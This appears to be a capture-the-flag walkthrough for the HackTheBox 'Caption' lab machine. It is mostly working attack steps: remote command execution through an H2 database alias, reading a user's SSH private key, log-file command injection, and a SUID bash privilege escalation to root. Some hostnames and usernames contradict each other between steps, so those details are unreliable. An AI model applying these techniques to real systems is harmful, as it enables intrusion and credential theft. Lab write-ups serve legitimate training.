Hackthebox - Caption [machine]

Step-by-Step Solution for “Caption” on HackTheBox:

Step 1: Access the Web Interface

• Navigate to the website to gain access to the admin panel:

  Go to: http://capstone.htb:8080
  

Step 2: Login Using Default Credentials

• Use the default credentials root:root to log in:

  Username: root
  Password: root
  

Step 3: Execute a Command via SQL Injection

• In the DB viewer, execute a command injection to list the user information:

  CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { 
      java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); 
      return s.hasNext() ? s.next() : "";  
  }$$;
  
  CALL EXECVE('id');
  

Step 4: Extract SSH Private Key

• Use the command injection to read the .ssh folder and extract the SSH key for user access:

  CALL EXECVE('cat /home/user/.ssh/id_rsa');
  

Step 5: SSH into the Machine

• Now that you have the SSH key, use it to log in:

  ssh -i id_rsa user@caption.htb
  

Step 6: Port Forwarding to Access Root Service

• Forward port 9090 to your local machine to exploit a service running as root:

  ssh -i id_rsa -L 9090:127.0.0.1:9090 margo@caption.htb
  

Step 7: Create a Malicious Log File

• On the remote machine, create a log file that includes a command injection to run a payload:

  echo '127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"' > /tmp/malicious.log
  

Step 8: Create the Payload

• Create a payload script that sets /bin/bash as SUID to elevate privileges:

  echo 'chmod +s /bin/bash' > /tmp/payload.sh
  chmod +x /tmp/payload.sh
  

Step 9: Create a Thrift Client to Trigger the Exploit

• On your local machine, create the log_service.thrift file for Thrift communication:

  echo 'namespace go log_service
  
  service LogService {
      string ReadLogFile(1: string filePath)
  }' > log_service.thrift
  

• Generate the Thrift client code:

  thrift -r --gen py log_service.thrift
  

Step 10: Run the Thrift Client to Exploit the Vulnerability

• Write the client.py script to read the malicious log file and trigger the command injection:

  from thrift import Thrift
  from thrift.transport import TSocket
  from thrift.transport import TTransport
  from thrift.protocol import TBinaryProtocol
  from log_service import LogService  # Import generated Thrift client code
  
  def main():
      # Set up a transport to the server
      transport = TSocket.TSocket('localhost', 9090)
  
      # Buffering for performance
      transport = TTransport.TBufferedTransport(transport)
  
      # Using a binary protocol
      protocol = TBinaryProtocol.TBinaryProtocol(transport)
  
      # Create a client to use the service
      client = LogService.Client(protocol)
  
      # Open the connection
      transport.open()
  
      try:
          # Specify the log file path to process
          log_file_path = "/tmp/malicious.log"
          
          # Call the remote method ReadLogFile and get the result
          response = client.ReadLogFile(log_file_path)
          print("Server response:", response)
      
      except Thrift.TException as tx:
          print(f"Thrift exception: {tx}")
  
      # Close the transport
      transport.close()
  
  if __name__ == '__main__':
      main()
  

• Install the necessary Python dependencies:

  pip3 install thrift
  

• Run the Thrift client:

  python3 client.py
  

Step 11: Get Root Access and the Flag

• After running the Thrift client, the /bin/bash binary will be set with SUID privileges. Run it with the -p flag to gain a root shell:

  /bin/bash -p
  

• Finally, read the root flag:

  cat /root/root.txt